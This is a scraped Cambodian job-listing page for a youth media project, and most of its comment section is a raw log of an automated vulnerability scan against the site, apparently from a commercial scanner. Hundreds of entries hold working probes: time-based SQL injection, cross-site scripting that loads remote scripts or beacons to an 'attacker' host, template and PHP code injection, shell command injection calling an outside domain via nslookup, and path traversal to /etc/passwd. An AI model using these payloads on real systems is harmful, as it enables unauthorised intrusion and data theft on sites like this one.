ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ក្លាហាន9
ក្លាហាន9 គឺជាគម្រោងបែបប្រព័ន្ធផ្សព្វផ្សាយចម្រុះតាមរយះទូរទស្សន៍ ប្រព័ន្ធផ្សព្វផ្សាយសង្គម និងសកម្មភាពផ្សព្វផ្សាយសហគមន៍ ក្នុងគោលបំណងគាំទ្រដល់យុវជនកម្ពុជា ធ្វើឲ្យជីវិតរបស់ពួកគេមានភាពប្រសើរឡើងតាមរយះការផ្តល់នូវព័ត៌មាន និងចំណេះដឹងពីការងារ សុវត្ថិភាពសេដ្ឋកិច្ច ជំនាញទន់ និងជំនាញជីវិត ក៏ដូចជាការចរចារជាមួយគ្រួសារ និងអ្នកដែលមានឥទ្ធិពលជុំវិញខ្លួនរបស់ពួកគេ។ ស្វែងរកពួកយើងតាមតំណខាងក្រោម៖ ហ្វេសប៊ុក: https://www.facebook.com/klahan9cambodia យូធូប: https://www.youtube.com/klahan9cambodia

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 21

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 1 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:55:31


  @@fUOmP


 • pHqghUme

  2021-05-06 08:55:26


  1'"


 • pHqghUme

  2021-05-06 08:55:25


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:55:16


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:55:03


  LuQpK2iT')) OR 238=(SELECT 238 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:54:44


  X1WRBfTc') OR 535=(SELECT 535 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:54:27


  ElHH63jJ' OR 398=(SELECT 398 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:54:08


  -1)) OR 942=(SELECT 942 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:53:50


  -5) OR 968=(SELECT 968 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:53:29


  -5 OR 813=(SELECT 813 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:53:08


  5RjcgYj1'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:52:44


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:52:19


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:51:57


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:51:33


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:51:14


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:50:58


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:50:42


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:50:28


  -1" OR 2+101-101-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:50:27


  -1' OR 2+521-521-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:50:27


  -1' OR 2+755-755-1=0+0+0+1 or 'VIjLZQCP'='


 • pHqghUme

  2021-05-06 08:50:26


  -1 OR 2+787-787-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:50:25


  -1 OR 2+741-741-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:50:24


  FFeqN3Bx


 • pHqghUme

  2021-05-06 08:50:07


  1


 • pHqghUme

  2021-05-06 08:49:46


  1


 • @@1vC3Q

  2021-05-06 08:49:32


  1


 • 1'"

  2021-05-06 08:49:24


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:49:23


  1


 • W7pcj1yk')) OR 230=(SELECT 230 FROM PG_SLEEP(15))--

  2021-05-06 08:49:07


  1


 • aGpPUoAg') OR 586=(SELECT 586 FROM PG_SLEEP(15))--

  2021-05-06 08:48:48


  1


 • pj3QgR0U' OR 685=(SELECT 685 FROM PG_SLEEP(15))--

  2021-05-06 08:48:31


  1


 • 3hmj1sWV'; waitfor delay '0:0:15' --

  2021-05-06 08:48:12


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:47:54


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:47:37


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:47:18


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:46:58


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:46:43


  1


 • -1' OR 2+875-875-1=0+0+0+1 or 'MQYIQDG3'='

  2021-05-06 08:46:28


  1


 • -1" OR 2+962-962-1=0+0+0+1 --

  2021-05-06 08:46:28


  1


 • -1' OR 2+766-766-1=0+0+0+1 --

  2021-05-06 08:46:27


  1


 • -1 OR 2+221-221-1=0+0+0+1

  2021-05-06 08:46:26


  1


 • -1 OR 2+579-579-1=0+0+0+1 --

  2021-05-06 08:46:25


  1


 • Vh7JHi7R

  2021-05-06 08:46:24


  1


 • pHqghUme

  2021-05-06 08:46:09


  1


 • pHqghUme

  2021-05-06 08:45:43


  1


 • pHqghUme

  2021-05-06 08:45:25


  1


 • pHqghUme

  2021-05-06 08:45:19


  1


 • pHqghUme

  2021-05-06 08:45:18


  1


 • pHqghUme

  2021-05-06 08:44:55


  1


 • pHqghUme

  2021-05-06 08:44:30


  1


 • pHqghUme

  2021-05-06 08:44:10


  1


 • pHqghUme

  2021-05-06 08:43:55


  1


 • pHqghUme

  2021-05-06 08:43:38


  1


 • pHqghUme

  2021-05-06 08:43:20


  1


 • pHqghUme

  2021-05-06 08:43:03


  1


 • pHqghUme

  2021-05-06 08:42:41


  1


 • pHqghUme

  2021-05-06 08:42:19


  1


 • pHqghUme

  2021-05-06 08:42:02


  1


 • pHqghUme

  2021-05-06 08:42:01


  1


 • pHqghUme

  2021-05-06 08:42:00


  1


 • pHqghUme

  2021-05-06 08:41:59


  1


 • pHqghUme

  2021-05-06 08:41:58


  1


 • pHqghUme

  2021-05-06 08:41:57


  1


 • pHqghUme

  2021-05-06 08:41:33


  1


 • pHqghUme

  2021-05-06 08:41:11


  1


 • pHqghUme

  2021-05-06 08:40:51


  1


 • pHqghUme

  2021-05-06 08:40:46


  1


 • pHqghUme

  2021-05-06 08:40:46


  1


 • pHqghUme

  2021-05-06 08:40:25


  1


 • pHqghUme

  2021-05-06 08:39:57


  1


 • pHqghUme

  2021-05-06 08:39:37


  1


 • pHqghUme

  2021-05-06 08:39:16


  1


 • pHqghUme

  2021-05-06 08:38:55


  1


 • pHqghUme

  2021-05-06 08:38:35


  1


 • pHqghUme

  2021-05-06 08:38:18


  1


 • pHqghUme

  2021-05-06 08:37:56


  1


 • pHqghUme

  2021-05-06 08:37:38


  1


 • pHqghUme

  2021-05-06 08:37:21


  1


 • pHqghUme

  2021-05-06 08:37:20


  1


 • pHqghUme

  2021-05-06 08:37:20


  1


 • pHqghUme

  2021-05-06 08:37:19


  1


 • pHqghUme

  2021-05-06 08:37:18


  1


 • pHqghUme

  2021-05-06 08:37:17


  1


 • pHqghUme

  2021-05-06 08:37:08


  1<H4Cb57<


 • pHqghUme

  2021-05-06 08:36:59


  1<img sRc='http://attacker-9456/log.php?


 • pHqghUme

  2021-05-06 08:36:53


  1<obSTD2 x=9564>


 • pHqghUme

  2021-05-06 08:36:49


  1


 • pHqghUme

  2021-05-06 08:36:45


  1<ifRAme sRc=9115.com></IfRamE>


 • pHqghUme

  2021-05-06 08:36:38


  1<WMYNB7>ZBNTB[!+!]</WMYNB7>


 • pHqghUme

  2021-05-06 08:36:30


  1


 • pHqghUme

  2021-05-06 08:36:28


  1wf3s3 <ScRiPt >OO83(9873)</ScRiPt>


 • pHqghUme

  2021-05-06 08:36:21


  1<% contenteditable onresize=OO83(9277)>


 • pHqghUme

  2021-05-06 08:36:16


  1}body{acu:Expre/**/SSion(OO83(9649))}


 • pHqghUme

  2021-05-06 08:36:10


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 08:36:05


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 08:35:58


  1<input autofocus onfocus=OO83(9760)>


 • pHqghUme

  2021-05-06 08:35:49


  1&lt;ScRiPt&gt;OO83(9505)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 08:35:43


  1\u003CScRiPt\OO83(9919)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 08:35:36


  %31%3C%53%63%52%69%50%74%20%3E%4F%4F%38%33%289981%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:35:31


  1<img/src=">" onerror=alert(9556)>


 • pHqghUme

  2021-05-06 08:35:26


  1<img src=xyz OnErRor=OO83(9591)>


 • pHqghUme

  2021-05-06 08:35:20


  1<img src=//xss.bxss.me/t/dot.gif onload=OO83(9487)>


 • pHqghUme

  2021-05-06 08:35:15


  1<body onload=OO83(9705)>


 • pHqghUme

  2021-05-06 08:35:09


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9003'>


 • pHqghUme

  2021-05-06 08:35:04


  1<isindex type=image src=1 onerror=OO83(9341)>


 • pHqghUme

  2021-05-06 08:34:58


  1<ScRiPt >OO83(9881)</ScRiPt>


 • pHqghUme

  2021-05-06 08:34:53


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9241></ScRiPt>


 • pHqghUme

  2021-05-06 08:34:49


  1<ScRiPt >OO83(9870)</ScRiPt>


 • pHqghUme

  2021-05-06 08:34:45


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4F%4F%38%33%28%39%32%31%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 08:34:40


  1<script>OO83(9600)</script>


 • pHqghUme

  2021-05-06 08:34:36


  1<WSNGHG>3ASYC[!+!]</WSNGHG>


 • pHqghUme

  2021-05-06 08:34:30


  1<ScRiPt >OO83(9150)</ScRiPt>


 • pHqghUme

  2021-05-06 08:34:26


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 08:34:22


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 08:34:15


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 08:34:08


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 08:34:01


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:33:52


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 08:33:42


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:33:34


  acux6524%C0%BEz1%C0%BCz2a%90bcxuca6524


 • pHqghUme

  2021-05-06 08:33:28


  acu4124%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4124


 • pHqghUme

  2021-05-06 08:33:22


  19745239


 • pHqghUme

  2021-05-06 08:33:13


  '"()&%<acx><ScRiPt >OO83(9912)</ScRiPt>


 • pHqghUme

  2021-05-06 08:33:06


  1'"()&%<acx><ScRiPt >OO83(9965)</ScRiPt>


 • pHqghUme<S9MNJx<

  2021-05-06 08:33:01


  1


 • pHqghUme<img sRc='http://attacker-9953/log.php?

  2021-05-06 08:32:55


  1


 • pHqghUme

  2021-05-06 08:32:51


  1


 • pHqghUme<22RVfd x=9819>

  2021-05-06 08:32:50


  1


 • pHqghUme<ifRAme sRc=9411.com></IfRamE>

  2021-05-06 08:32:44


  1


 • pHqghUme<WKGVUJ>PBDVJ[!+!]</WKGVUJ>

  2021-05-06 08:32:37


  1


 • pHqghUmehDeTf <ScRiPt >OO83(9472)</ScRiPt>

  2021-05-06 08:32:33


  1


 • pHqghUme

  2021-05-06 08:32:32


  1


 • pHqghUme<% contenteditable onresize=OO83(9678)>

  2021-05-06 08:32:29


  1


 • pHqghUme}body{acu:Expre/**/SSion(OO83(9554))}

  2021-05-06 08:32:22


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:32:16


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:32:10


  1


 • pHqghUme<input autofocus onfocus=OO83(9577)>

  2021-05-06 08:32:00


  1


 • pHqghUme&lt;ScRiPt&gt;OO83(9290)&lt;/sCripT&gt;

  2021-05-06 08:31:48


  1


 • pHqghUme\u003CScRiPt\OO83(9977)\u003C/sCripT\u003E

  2021-05-06 08:31:39


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%4F%4F%38%33%289319%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:31:29


  1


 • pHqghUme<img/src=">" onerror=alert(9513)>

  2021-05-06 08:31:21


  1


 • pHqghUme<img src=xyz OnErRor=OO83(9338)>

  2021-05-06 08:31:14


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=OO83(9629)>

  2021-05-06 08:31:06


  1


 • pHqghUme<body onload=OO83(9211)>

  2021-05-06 08:30:58


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9468'>

  2021-05-06 08:30:51


  1


 • pHqghUme<isindex type=image src=1 onerror=OO83(9246)>

  2021-05-06 08:30:47


  1


 • pHqghUme<ScRiPt >OO83(9069)</ScRiPt>

  2021-05-06 08:30:38


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9049></ScRiPt>

  2021-05-06 08:30:32


  1


 • pHqghUme<ScRiPt >OO83(9340)</ScRiPt>

  2021-05-06 08:30:27


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4F%4F%38%33%28%39%38%37%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:30:22


  1


 • pHqghUme<script>OO83(9761)</script>

  2021-05-06 08:30:17


  1


 • pHqghUme<WCBZVJ>HJMAA[!+!]</WCBZVJ>

  2021-05-06 08:30:13


  1


 • pHqghUme<ScRiPt >OO83(9488)</ScRiPt>

  2021-05-06 08:30:07


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:30:01


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:29:54


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:29:48


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:29:42


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:29:37


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:29:30


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:29:21


  1


 • acux9827%C0%BEz1%C0%BCz2a%90bcxuca9827

  2021-05-06 08:29:16


  1


 • acu4979%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4979

  2021-05-06 08:29:10


  1


 • pHqghUme9628705

  2021-05-06 08:29:05


  1


 • '"()&%<acx><ScRiPt >OO83(9556)</ScRiPt>

  2021-05-06 08:28:58


  1


 • pHqghUme'"()&%<acx><ScRiPt >OO83(9061)</ScRiPt>

  2021-05-06 08:28:51


  1


 • pHqghUme

  2021-05-06 08:28:41


  1


 • pHqghUme

  2021-05-06 08:28:35


  1


 • pHqghUme

  2021-05-06 08:28:28


  1


 • pHqghUme

  2021-05-06 08:28:24


  1


 • pHqghUme

  2021-05-06 08:28:18


  1


 • pHqghUme

  2021-05-06 08:28:12


  1


 • pHqghUme

  2021-05-06 08:28:08


  '"


 • pHqghUme

  2021-05-06 08:28:08


  <!--


 • <!--

  2021-05-06 08:28:07


  1


 • pHqghUme

  2021-05-06 08:28:06


  1


 • '"

  2021-05-06 08:28:06


  1


 • pHqghUme

  2021-05-06 08:28:05


  1


 • pHqghUme

  2021-05-06 08:28:05


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:28:05


  1


 • pHqghUme

  2021-05-06 08:28:05


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:28:04


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:28:04


  1


 • pHqghUme

  2021-05-06 08:28:04


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 08:28:03


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:28:03


  ';print(md5(31337));$a='


 • /xfs.bxss.me

  2021-05-06 08:28:02


  1


 • pHqghUme

  2021-05-06 08:28:02


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • ${@print(md5(31337))}\

  2021-05-06 08:28:01


  1


 • pHqghUme

  2021-05-06 08:28:01


  1


 • '.print(md5(31337)).'

  2021-05-06 08:28:01


  1


 • ";print(md5(31337));$a="

  2021-05-06 08:28:00


  1


 • pHqghUme

  2021-05-06 08:28:00


  "+"A".concat(70-3).concat(22*4).concat(119).concat(74).concat(103).concat(71)+(require"socket" Socket.gethostbyname("hitmi"+"chbatqvv03c72.bxss.me.")[3].to_s)+"


 • ${@print(md5(31337))}

  2021-05-06 08:28:00


  1


 • pHqghUme

  2021-05-06 08:28:00


  1


 • pHqghUme

  2021-05-06 08:28:00


  '+'A'.concat(70-3).concat(22*4).concat(97).concat(89).concat(109).concat(78)+(require'socket' Socket.gethostbyname('hitwx'+'jkrdpuugb1394.bxss.me.')[3].to_s)+'


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:27:59


  1


 • pHqghUme

  2021-05-06 08:27:59


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • "+"A".concat(70-3).concat(22*4).concat(111).concat(73).concat(102).concat(73)+(require"socket" Socket.gethostbyname("hitdp"+"lgsowewp04d28.bxss.me.")[3].to_s)+"

  2021-05-06 08:27:59


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:27:59


  1


 • '+'A'.concat(70-3).concat(22*4).concat(118).concat(77).concat(101).concat(86)+(require'socket' Socket.gethostbyname('hitmg'+'pyaatxggc9e73.bxss.me.')[3].to_s)+'

  2021-05-06 08:27:59


  1


 • pHqghUme

  2021-05-06 08:27:58


  1


 • pHqghUme

  2021-05-06 08:27:58


  1


 • pHqghUme

  2021-05-06 08:27:58


  1


 • pHqghUme

  2021-05-06 08:27:58


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:27:58


  1


 • pHqghUme

  2021-05-06 08:27:58


  1


 • pHqghUme

  2021-05-06 08:27:57


  1


 • pHqghUme

  2021-05-06 08:27:57


  1


 • pHqghUme

  2021-05-06 08:27:57


  1


 • pHqghUme

  2021-05-06 08:27:57


  1


 • pHqghUme

  2021-05-06 08:27:57


  1


 • pHqghUme

  2021-05-06 08:27:56


  1


 • pHqghUme

  2021-05-06 08:27:55


  1


 • pHqghUme

  2021-05-06 08:27:55


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:27:55


  1


 • pHqghUme

  2021-05-06 08:27:55


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:27:54


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:27:54


  1


 • pHqghUme

  2021-05-06 08:27:54


  '"()


 • pHqghUme

  2021-05-06 08:27:54


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 08:27:54


  1


 • pHqghUme

  2021-05-06 08:27:53


  1


 • pHqghUme

  2021-05-06 08:27:53


  1


 • pHqghUme

  2021-05-06 08:27:53


  1


 • pHqghUme

  2021-05-06 08:27:53


  1


 • pHqghUme

  2021-05-06 08:27:52


  1


 • pHqghUme

  2021-05-06 08:27:52


  1


 • pHqghUme

  2021-05-06 08:27:52


  1


 • '"()

  2021-05-06 08:27:49


  1


 • pHqghUme

  2021-05-06 08:27:46


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 08:27:46


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 08:27:45


  )


 • pHqghUme

  2021-05-06 08:27:45


  1


 • pHqghUme

  2021-05-06 08:27:45


  1&n990591=v906552


 • !(()&&!|*|*|

  2021-05-06 08:27:44


  1


 • pHqghUme

  2021-05-06 08:27:44


  '.gethostbyname(lc('hitdz'.'noovpjsc6875a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(69).chr(105).chr(74).'


 • ^(#$!@#$)(()))******

  2021-05-06 08:27:44


  1


 • pHqghUme

  2021-05-06 08:27:44


  ".gethostbyname(lc("hitlr"."hoelykuo68490.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(88).chr(108).chr(86)."


 • pHqghUme

  2021-05-06 08:27:43


  1


 • '.gethostbyname(lc('hitpy'.'dxaftvqkab4c2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(68).chr(101).chr(75).'

  2021-05-06 08:27:43


  1


 • ".gethostbyname(lc("hitib"."hjimecjw225b9.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(83).chr(119).chr(89)."

  2021-05-06 08:27:43


  1


 • )

  2021-05-06 08:27:43


  1


 • pHqghUme

  2021-05-06 08:27:42


  1


 • pHqghUme

  2021-05-06 08:27:42


  1


 • pHqghUme

  2021-05-06 08:27:42


  1


 • pHqghUme

  2021-05-06 08:27:41


  1


 • pHqghUme

  2021-05-06 08:27:41


  1


 • pHqghUme

  2021-05-06 08:27:41


  1


 • pHqghUme

  2021-05-06 08:27:40


  1


 • pHqghUme

  2021-05-06 08:27:40


  1


 • pHqghUme

  2021-05-06 08:27:39


  1


 • pHqghUme&n961439=v900412

  2021-05-06 08:27:39


  1


 • pHqghUme

  2021-05-06 08:27:39


  1


 • pHqghUme

  2021-05-06 08:27:37


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 08:27:37


  bxss.me


 • pHqghUme

  2021-05-06 08:27:36


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 08:27:36


  Http://bxss.me/t/fit.txt


 • bxss.me

  2021-05-06 08:27:35


  1


 • pHqghUme

  2021-05-06 08:27:35


  1


 • pHqghUme

  2021-05-06 08:27:35


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:27:34


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:27:34


  1


 • pHqghUme

  2021-05-06 08:27:33


  `(nslookup hitcqefeeuhyhd24cf.bxss.me||perl -e "gethostbyname('hitcqefeeuhyhd24cf.bxss.me')")`


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:27:33


  1


 • pHqghUme

  2021-05-06 08:27:32


  1


 • pHqghUme

  2021-05-06 08:27:32


  |(nslookup hitswdqejwbyz34586.bxss.me||perl -e "gethostbyname('hitswdqejwbyz34586.bxss.me')")


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:27:32


  1


 • pHqghUme

  2021-05-06 08:27:31


  1


 • pHqghUme

  2021-05-06 08:27:31


  1


 • pHqghUme

  2021-05-06 08:27:30


  1


 • pHqghUme

  2021-05-06 08:27:30


  1


 • pHqghUme

  2021-05-06 08:27:30


  1


 • pHqghUme

  2021-05-06 08:27:29


  1


 • pHqghUme

  2021-05-06 08:27:29


  1


 • pHqghUme

  2021-05-06 08:27:29


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 08:27:28


  $(nslookup hitnwbjflcjtx81d00.bxss.me||perl -e "gethostbyname('hitnwbjflcjtx81d00.bxss.me')")


 • pHqghUme

  2021-05-06 08:27:27


  1


 • pHqghUme

  2021-05-06 08:27:27


  1


 • pHqghUme

  2021-05-06 08:27:27


  (nslookup hitstbftkvsud69f1f.bxss.me||perl -e "gethostbyname('hitstbftkvsud69f1f.bxss.me')")


 • pHqghUme

  2021-05-06 08:27:27


  1


 • pHqghUme

  2021-05-06 08:27:26


  &echo devdru$()\ mesjuv\nz^xyu||a #' &echo devdru$()\ mesjuv\nz^xyu||a #|" &echo devdru$()\ mesjuv\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:27:26


  |echo tjqepw$()\ ezkcfs\nz^xyu||a #' |echo tjqepw$()\ ezkcfs\nz^xyu||a #|" |echo tjqepw$()\ ezkcfs\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:27:25


  echo mskowf$()\ ekahqu\nz^xyu||a #' &echo mskowf$()\ ekahqu\nz^xyu||a #|" &echo mskowf$()\ ekahqu\nz^xyu||a #


 • dnZNTlBJY3o=

  2021-05-06 08:27:23


  1


 • pHqghUme

  2021-05-06 08:27:22


  ${10000273+9999082}


 • |(nslookup hitxvjuwccwjr98bd5.bxss.me||perl -e "gethostbyname('hitxvjuwccwjr98bd5.bxss.me')")

  2021-05-06 08:27:21


  1


 • pHqghUme

  2021-05-06 08:27:21


  1


 • `(nslookup hitatweudmbhs31e16.bxss.me||perl -e "gethostbyname('hitatweudmbhs31e16.bxss.me')")`

  2021-05-06 08:27:21


  1


 • ${9999814+10000399}

  2021-05-06 08:27:21


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:27:20


  1


 • pHqghUme

  2021-05-06 08:27:20


  1


 • pHqghUme

  2021-05-06 08:27:18


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:27:18


  1


 • pHqghUme

  2021-05-06 08:27:18


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 08:27:17


  1


 • $(nslookup hitjluyrzqftb51ee8.bxss.me||perl -e "gethostbyname('hitjluyrzqftb51ee8.bxss.me')")

  2021-05-06 08:27:17


  1


 • (nslookup hitoyjfxaprjo7bf2b.bxss.me||perl -e "gethostbyname('hitoyjfxaprjo7bf2b.bxss.me')")

  2021-05-06 08:27:16


  1


 • &echo roflit$()\ szeqpx\nz^xyu||a #' &echo roflit$()\ szeqpx\nz^xyu||a #|" &echo roflit$()\ szeqpx\nz^xyu||a #

  2021-05-06 08:27:15


  1


 • |echo icjuor$()\ ppxbky\nz^xyu||a #' |echo icjuor$()\ ppxbky\nz^xyu||a #|" |echo icjuor$()\ ppxbky\nz^xyu||a #

  2021-05-06 08:27:15


  1


 • echo xjqgyl$()\ gmwcfu\nz^xyu||a #' &echo xjqgyl$()\ gmwcfu\nz^xyu||a #|" &echo xjqgyl$()\ gmwcfu\nz^xyu||a #

  2021-05-06 08:27:14


  1


 • pHqghUme

  2021-05-06 08:27:13


  1


 • pHqghUme

  2021-05-06 08:27:12


  1


 • pHqghUme

  2021-05-06 08:27:10


  1


 • pHqghUme

  2021-05-06 08:27:10


  1


 • pHqghUme

  2021-05-06 08:27:07


  1


 • pHqghUme

  2021-05-06 08:27:07


  1


 • pHqghUme

  2021-05-06 08:27:06


  1


 • pHqghUme

  2021-05-06 08:27:06


  1


 • pHqghUme

  2021-05-06 08:27:06


  1


 • pHqghUme

  2021-05-06 08:27:06


  1


 • pHqghUme

  2021-05-06 08:27:05


  1


 • pHqghUme

  2021-05-06 08:27:03


  ../1


 • pHqghUme

  2021-05-06 08:27:02


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 08:27:02


  1


 • ../pHqghUme

  2021-05-06 08:27:01


  1


 • pHqghUme

  2021-05-06 08:27:01


  1


 • pHqghUme

  2021-05-06 08:27:01


  ../../../../../../../../../../../../../../etc/passwd


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:27:00


  1


 • pHqghUme

  2021-05-06 08:27:00


  1


 • pHqghUme

  2021-05-06 08:27:00


  1


 • pHqghUme

  2021-05-06 08:26:59


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:26:59


  1


 • pHqghUme

  2021-05-06 08:26:58


  1


 • pHqghUme

  2021-05-06 08:26:58


  1


 • pHqghUme

  2021-05-06 08:26:57


  1


 • pHqghUme

  2021-05-06 08:26:57


  1


 • pHqghUme

  2021-05-06 08:26:57


  1


 • pHqghUme

  2021-05-06 08:26:57


  1


 • pHqghUme

  2021-05-06 08:26:56


  1


 • pHqghUme

  2021-05-06 08:26:56


  1


 • pHqghUme

  2021-05-06 08:26:56


  1


 • pHqghUme

  2021-05-06 08:26:55


  1


 • pHqghUme

  2021-05-06 08:26:55


  1


 • pHqghUme

  2021-05-06 08:26:55


  1


 • pHqghUme

  2021-05-06 08:26:54


  1


 • pHqghUme

  2021-05-06 08:26:52


  1


 • 0LlIfXx2

  2021-05-06 08:26:50


  1


 • pHqghUme

  2021-05-06 08:26:50


  7y6vb6gp


 • pHqghUme

  2021-05-06 08:26:49


  1


 • pHqghUme

  2021-05-06 08:26:49


  1


 • pHqghUme

  2021-05-06 08:26:48


  1


 • pHqghUme

